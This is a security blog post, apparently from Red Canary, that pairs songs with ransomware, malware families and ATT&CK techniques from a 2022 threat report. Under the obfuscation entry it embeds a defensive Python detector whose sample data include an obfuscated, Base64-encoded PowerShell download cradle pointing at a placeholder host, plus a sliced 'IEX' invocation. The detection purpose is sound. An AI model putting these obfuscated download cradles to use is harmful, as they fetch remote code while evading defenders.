
Liner notes

Threat sounds vol. 2: The 2022 Threat Detection Report playlist

We’re excited to drop the needle on Threat sounds vol. 2, a playlist to accompany the 2022 Threat Detection Report. Like last year, we picked a song for each of the most prevalent threats and ATT&CK techniques Red Canary observed in 2021. This time around, we’re opening the set with songs about trends to tie it all together. Read our liner notes below, and don’t forget to press play on Spotify!

Side 1: Trends

1. Ransomware

“Smooth Criminal” by Alien Ant Farm

Admins, are you okay? Ransomware operators introduced a bevy of new tactics in 2021, leaving victims bewildered after getting struck by a smooth criminal.

2. Supply chain compromises

“Chain of Fools” by Aretha Franklin

You might feel like a fool for trusting a vendor that ended up getting compromised, but there’s actually a lot you can do to mitigate damage from a third-party intrusion.

3. Vulnerabilities

“Vulnerable” by Selena Gomez

High-profile proofs of concept like PrintNightmare and ProxyShell left our networks—and our hearts—feeling vulnerable.

4. Affiliates

“Affiliated” by Snoop Dogg

You never know who’s gonna show up for a verse on a Snoop Dogg track, and with the new “as-a-Service” economy taking hold, ransomware operators have also embraced the power of collaboration.

5. Crypters-as-a-service

Theme from “Tales From The Crypt”

If the “as-a-Service” trend continues, creepy crypters like HCrypt and Snip3 will send shivers up your spine and malware through your network!

6. Common webshells

“Common People” by William Shatner

William Shatner’s lack of vocal talent didn’t stop him from covering this Pulp song, and a lack of hacking chops won’t stop an adversary from dropping web shells on exploited applications like Microsoft Exchange and Zoho ManageEngine.

7. User-initiated initial access

“Dynamite” by BTS

Adversaries often manipulate search engine results to lure victims into clicking on malicious links. In the spirit of SEO hijinks, we’re including this song from BTS to get more page views from K-POP fans.

8. Malicious macOS installers

“The Bird That You Can’t See” by The Apples in Stereo

Considering we name all of the novel activity clusters we track after birds, this song was a natural choice.

9. Linux coinminers

“She Works Hard For The Money” by Donna Summer

Coinminers—the most prevalent threat we observed in Linux environments for the past two years—make it so cybercriminals don’t have to work so hard for the money.

10. Remote monitoring and management abuse

“Oceans Away” by A R I Z O N A

By abusing legitimate tools such as ScreenConnect, Atera, and AnyDesk, adversaries can gain access to victims’ environments from oceans away.

11. Abusing remote procedure calls

“Remote Control” by The Beastie Boys

Adversaries can abuse remote procedure calls (RPC) to escalate their privileges, as we saw in the PrintNightmare and PetitPotam attacks last summer.

12. Defense validation and testing

“Red (Taylor’s Version)” by Taylor Swift

We see a lot of testing on customer environments, often from open source tools like Atomic Red Team (Red Canary’s version).

Side 2: Threats

1. Rose Flamingo

“Kiss From a Rose” by Seal

One of several new activity clusters we identified last year, Rose Flamingo targets victims who are looking to download licensed software without having to pay for it. A “password” text file is this adversary’s power, pleasure, and pain.

2. Silver Sparrow

“Silver Springs” by Fleetwood Mac

Our article introducing Silver Sparrow macOS malware was the most read post on the Red Canary blog last year. Thank goodness our Intelligence team gets along better than the members of Fleetwood Mac.

3. Bazar

“How Bizarre” by OMC

It’s making us crazy trying to keep track of all the variants of the Bazar family of malware. Every time we look around, there’s a new one in our face.

4. Latent threats

“Zombie” by the Cranberries

Don’t discount operations that appear to have ceased or been taken down by law enforcement. Last year we saw a number of threats—such as WannaCry and Gamarue—come back from the dead like a zombie-ie-ie.

5. Yellow Cockatoo

“Yellow Ledbetter” by Pearl Jam

We saw a spike of Yellow Cockatoo detections in September 2021, just in time for flannel shirt and Doc Martens season.

6. Impacket

“Trust In Me (The Python’s Song)” by Sterling Holloway

This throwback from Disney’s The Jungle Book is evocative of the slithering manner with which adversaries abuse the Impacket library of Python scripts.

7. SocGholish

“Drive By” by Train

Contrary to what the lead singer of Train might tell you, that sketchy software update is in fact a SocGholish drive-by download.

8. BloodHound

“The Bad Touch” by the BloodHound Gang

This song is definitely NSFW…but then again, neither is malware.

9. Cobalt Strike

“Blue (Da Ba Dee)” by Eiffel 65

Now listen up, here’s the story, about a little adversary simulation tool that adversaries just can’t quit abusing for command and control.

10. Gootkit

“Everytime We Touch” by Cascada

Every time we touch a Gootkit detection, we’re amazed by how much this malware has evolved over the past decade.

Bonus tracks: Techniques

1. PowerShell (T1059.001)

“The Power” by Snap!

This Jock Jam will pump you up while diving into the Antimalware Scan Interface (AMSI) to detect evidence of PowerShell abuse.

2. Windows Command Shell (T1059.003)

“Shell Games” by Bright Eyes

Adversaries play shell games when they leverage Windows Command Shell for obfuscation.

3. Rundll32 (T1218.011)

“Run Away With Me” by Carly Rae Jepsen

Run away with us as we weed out malicious DLL files and jam out to this epic sax solo.

4. Windows Management Instrumentation (T1047)

“Time to Pretend” by MGMT

An adversary can use Windows Management Instrumentation (WMI) to execute commands on remote systems and move laterally across a network, essentially pretending to be an admin. Meanwhile, we’re pretending that indie rock from the early aughts is still cool.

5. OS Credential Dumping: LSASS Memory (T1003.001)

“Dancing On My Own” by Robyn

For this credential-dumping technique, we picked our favorite heartbreak anthem for anyone who just got dumped.

6. Ingress Tool Transfer (T1105)

“Maggie’s Farm” by Bob Dylan

Like Dylan going electric, some adversaries pivot from “living-off-the-land” techniques and drop their own tools on a victim system.

7. Process Injection (T1055)

“I Heard It Through The Grapevine” by The California Raisins

By injecting arbitrary code into an otherwise legitimate process, adversaries can evade defenders and even steal data, so they don’t have to rely so much on the grapevine.

8. Scheduled Task/Job: Scheduled Task (T1053.005)

“Five O’Clock World” by The Vogues

Adversaries abuse the Windows Task Scheduler to execute a recurring process or time their intrusions strategically, say, after the 9-5 shift ends and happy hour starts.

9. Obfuscated Files or Information (T1027)

“Outtasite (Outta Mind)” by Wilco

We often see adversaries employ Base64 encoding, string concatenation, and substrings to stay outtasite and outta mind.
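As an added illustration of those three patterns (this is example code written for these liner notes, not tooling from the report or from Red Canary), the script below triages constructed PowerShell command lines: it recognizes the -EncodedCommand flag and any of the abbreviated prefixes PowerShell accepts for it, decodes the Base64-wrapped UTF-16LE payload, flags 'a'+'b' string concatenation and .Substring() slicing, and collapses the concatenated literals back into the string the adversary was hiding. The sample command lines, including the example.invalid URL, are made up for the demonstration.

```python
import base64
import re
from typing import Optional

# Obfuscation markers this track calls out: Base64-encoded commands,
# string concatenation such as 'In'+'voke', and .Substring() slicing.
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
SUBSTRING_RE = re.compile(r"\.Substring\s*\(", re.IGNORECASE)


def encode_ps(script: str) -> str:
    """Build what `powershell -EncodedCommand` expects: Base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> Optional[str]:
    """Decode an -EncodedCommand blob; None if it is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_encoded_flag(token: str) -> bool:
    """PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    if token[:1] not in "-/":
        return False
    name = token[1:].lower()
    return len(name) >= 1 and "encodedcommand".startswith(name)


def collapse_concat(script: str) -> str:
    """Join 'a'+'b' literal pairs until nothing changes, so chains of any length fold up."""
    prev = None
    while prev != script:
        prev = script
        script = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
    return script


def analyze(cmdline: str) -> dict:
    """Return the obfuscation indicators found in one command line plus a deobfuscated view."""
    indicators = []
    script = cmdline
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            decoded = decode_ps(tokens[i + 1])
            if decoded is not None:
                indicators.append("base64_encoded_command")
                script = decoded  # inspect the real payload, not the Base64 wrapper
                break
    if CONCAT_RE.search(script):
        indicators.append("string_concatenation")
    if SUBSTRING_RE.search(script):
        indicators.append("substring")
    return {"indicators": indicators, "deobfuscated": collapse_concat(script)}


# Constructed sample command lines (not from the report). The first hides a
# download cradle behind Base64 plus concatenation; the second slices "IEX"
# out of a longer string; the third is a benign scheduled backup script.
SAMPLE_COMMANDS = [
    "powershell.exe -nop -w hidden -enc "
    + encode_ps("('In'+'vo'+'ke-Web'+'Request') 'http://example.invalid/a'"),
    "powershell.exe -Command \"$s='aaaIEXbbb'; $s.Substring(3,3)\"",
    "powershell.exe -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        result = analyze(cmd)
        print(result["indicators"] or ["clean"], "->", result["deobfuscated"])
```

Run it as a script and the first sample reports both the encoded command and the concatenation, with the payload rendered as a plain 'Invoke-WebRequest' call; the benign -File invocation produces no indicators. In production you would feed it the command line field from process-creation telemetry (Sysmon event ID 1 or Windows event ID 4688) rather than the embedded samples.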

10. Masquerading: Rename System Utilities (T1036.003)

“Suspicious Minds” by Elvis Presley

We can’t go on with all these suspiciously named system utilities floating around. Looking at you, AdFind.exe.

11. Masquerading: Match Legitimate Name or Location (T1036.005)

“Who Are You” by The Who

*cue CSI theme song* who who? who who?

12. Hijack Execution Flow: DLL Search Order Hijacking (T1574.001)

“Steal My Sunshine” by Len

DLL filenames can be deceiving…just like how the lyrics and music video for this song might have you thinking that the members of Len are a couple. They’re actually brother and sister!
